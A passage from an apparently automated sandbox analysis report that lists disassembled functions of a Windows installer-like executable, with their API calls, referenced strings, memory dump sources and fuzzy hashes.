                                                                    • Opcode ID: 84eac95e95d6c5eb007509f266f800828e6efa501b0eccf996cbc51e64bef556
                                                                    • Instruction ID: 8200ff4dc01eb7e5f3d0cd3b0db6b275db18d134b8f46633e684875e90eeb5b2
                                                                    • Opcode Fuzzy Hash: 84eac95e95d6c5eb007509f266f800828e6efa501b0eccf996cbc51e64bef556
                                                                    • Instruction Fuzzy Hash: 7D11C935D00109FADF05FFA1D897CEDBB79AF10308F50812AB915721E1DB7856899B98
                                                                    Function 00403F77 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?,00000000,?,?,00406260,?), ref: 00403FBD
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000,00404622,?,?), ref: 00403FFB
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?,00000000), ref: 00404021
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,%%S/,0041571C,?,?,?,%%S\,0041572C,?,?), ref: 00404029
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID: %%S/$%%S\
                                                                    • API String ID: 613200358-358529586
                                                                    • Opcode ID: e6382aac0b58fc4f3495a13b9dee087f390af011affcf5e9978a04eae41b0fba
                                                                    • Instruction ID: ba471a5e309da56b19bd8a7b5a96c0f25c3cff1cb933eb2d3e2d1b68bec26358
                                                                    • Opcode Fuzzy Hash: e6382aac0b58fc4f3495a13b9dee087f390af011affcf5e9978a04eae41b0fba
                                                                    • Instruction Fuzzy Hash: 1811F935C00109FADF05FFA1D993CEE7B38AF10308F50812AB915721E1DB7856899B88
                                                                    Function 0040D79C Relevance: 10.5, APIs: 1, Strings: 6, Instructions: 42COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrow
                                                                    • String ID: XkA$XkA$`lA$plA$xmA$xmA
                                                                    • API String ID: 432778473-1797977924
                                                                    • Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                    • Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
                                                                    • Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                                    • Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99
                                                                    Function 004054C1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD
                                                                      • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                                      • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                                      • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                                      • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                                    • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                                    • API String ID: 4038993085-372238525
                                                                    • Opcode ID: 2b903074784fb68403b64733b53b7fb33f9721368cdbd91069c7a4aef1d44472
                                                                    • Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
                                                                    • Opcode Fuzzy Hash: 2b903074784fb68403b64733b53b7fb33f9721368cdbd91069c7a4aef1d44472
                                                                    • Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98
                                                                    Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: wsprintf$ExitProcesslstrcat
                                                                    • String ID: 0x%p
                                                                    • API String ID: 2530384128-1745605757
                                                                    • Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                    • Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
                                                                    • Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                                    • Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69
                                                                    Function 00407DA1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00407DB6
                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
                                                                    • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
                                                                    • SHGetMalloc.SHELL32(00000000), ref: 00407E15
                                                                      • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                      • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                                    • String ID: A
                                                                    • API String ID: 1557639607-3554254475
                                                                    • Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                    • Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
                                                                    • Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                                    • Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5
                                                                    Function 00402B71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
                                                                    • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB
                                                                      • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                                      • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                                    • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                                    • String ID: SetEnvironment
                                                                    • API String ID: 612612615-360490078
                                                                    • Opcode ID: a1c705515403c0a0f0d3fe43341ef8c84b8a99b42ffc9b0f279362683b036e50
                                                                    • Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
                                                                    • Opcode Fuzzy Hash: a1c705515403c0a0f0d3fe43341ef8c84b8a99b42ffc9b0f279362683b036e50
                                                                    • Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8
                                                                    Function 0040464B Relevance: 7.6, APIs: 5, Instructions: 96stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@$lstrlen
                                                                    • String ID:
                                                                    • API String ID: 2031685711-0
                                                                    • Opcode ID: a45d510ae1538bb769c480bb42da49c1a16301055923b34945e590d69a25caba
                                                                    • Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
                                                                    • Opcode Fuzzy Hash: a45d510ae1538bb769c480bb42da49c1a16301055923b34945e590d69a25caba
                                                                    • Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648
                                                                    Function 0040809D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
                                                                      • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C
                                                                    • GetSystemMetrics.USER32(00000007), ref: 004080B4
                                                                    • GetSystemMetrics.USER32(00000007), ref: 004080C5
                                                                    • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$??3@
                                                                    • String ID: 100%%
                                                                    • API String ID: 2562992111-568723177
                                                                    • Opcode ID: f97ada8ea1c28143f02298183820e063e18118760441c1241ef7ee3e932a0dae
                                                                    • Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
                                                                    • Opcode Fuzzy Hash: f97ada8ea1c28143f02298183820e063e18118760441c1241ef7ee3e932a0dae
                                                                    • Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9
                                                                    Function 00404E99 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
                                                                      • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7
                                                                    • wsprintfW.USER32 ref: 00404F19
                                                                    • ??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: MetricsSystem$??3@wsprintf
                                                                    • String ID: %X - %03X - %03X - %03X - %03X$xcA
                                                                    • API String ID: 1174869416-1550840741
                                                                    • Opcode ID: ec52412db155f98f9bae88259a305981963c0d87f79b64e660b9967a4ff67c2f
                                                                    • Instruction ID: 41466d8614d0a23c37c50aec3ef54a83e840c1df2718244856808616b3002f3b
                                                                    • Opcode Fuzzy Hash: ec52412db155f98f9bae88259a305981963c0d87f79b64e660b9967a4ff67c2f
                                                                    • Instruction Fuzzy Hash: F9117F71D44218ABDB15EB90DC56FEDB334BB10B08F10417EEA55361D2DBB86A44CB9C
                                                                    Function 0040421B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                                    • lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                                    • _wcsnicmp.MSVCRT ref: 0040423D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$_wcsnicmp
                                                                    • String ID: Mg@
                                                                    • API String ID: 2823567412-3680729969
                                                                    • Opcode ID: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                    • Instruction ID: 9e1626592046255a92b3b8c2eb79444d9ed7104295bc7c238f4b93e2fb8c8d27
                                                                    • Opcode Fuzzy Hash: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                                    • Instruction Fuzzy Hash: 09E026726042019BC700CBA5ED84C8B7BECEAC8790B00087BF700E3011E334D8148BB5
                                                                    Function 004023B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                                    • API String ID: 2574300362-3900151262
                                                                    • Opcode ID: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                    • Instruction ID: 50d9489a907287b4f58dec005f8c8a71b0fe89906bae8f062ddf8536b40cf8c2
                                                                    • Opcode Fuzzy Hash: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                                    • Instruction Fuzzy Hash: C3D0C970A91700FBDB511FA0EE2DBD636A6EB80B0BF448436E812A00F0C7FC4884CA1C
                                                                    Function 004023E9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00402401
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                                    • API String ID: 2574300362-736604160
                                                                    • Opcode ID: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                    • Instruction ID: 88d9777829bf04cc8710f0dfabc1d7fbda4bae52ffa2c7d5b88ac942ae81d74a
                                                                    • Opcode Fuzzy Hash: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                                    • Instruction Fuzzy Hash: FFD0C970691600FAD7105FA4DD2DBC639A6AFC0B06F548026A016E00D4C7FC4880861D
                                                                    Function 0040CD11 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
                                                                    • ??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
                                                                    • memcpy.MSVCRT(00000000,0092AA58,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
                                                                    • ??3@YAXPAX@Z.MSVCRT(0092AA58,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@??3@ExceptionThrowmemcpy
                                                                    • String ID:
                                                                    • API String ID: 3462485524-0
                                                                    • Opcode ID: 7a43a3fc08f1f35b46db7763ec9cd67e84bfc7e399de81595ed43b4671788ed1
                                                                    • Instruction ID: d1fdfccabdcefd16927407a1053df183a81c89610647dbf5fb7e55cd38556c17
                                                                    • Opcode Fuzzy Hash: 7a43a3fc08f1f35b46db7763ec9cd67e84bfc7e399de81595ed43b4671788ed1
                                                                    • Instruction Fuzzy Hash: 2F11E572200300EBCB289F16D9C0D5BFFE9AF843547108A3FE559A7390D779E98547A8
                                                                    Function 00408A1C Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                                      • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                      • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
                                                                    • GetDlgItem.USER32(?,000004B7), ref: 00408A97
                                                                    • SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5
                                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                      • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                      • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                      • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                      • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                      • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                      • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                      • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                      • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                      • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                                      • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4546744746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4546705371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546775106.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546802029.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4546839031.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                                                    • String ID:
                                                                    • API String ID: 3043669009-0
                                                                    • Opcode ID: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                                    • Instruction ID: 5c7c764d92766e680c666047e1d2b266a9282aef260ce17b2660fed0a98cdec4
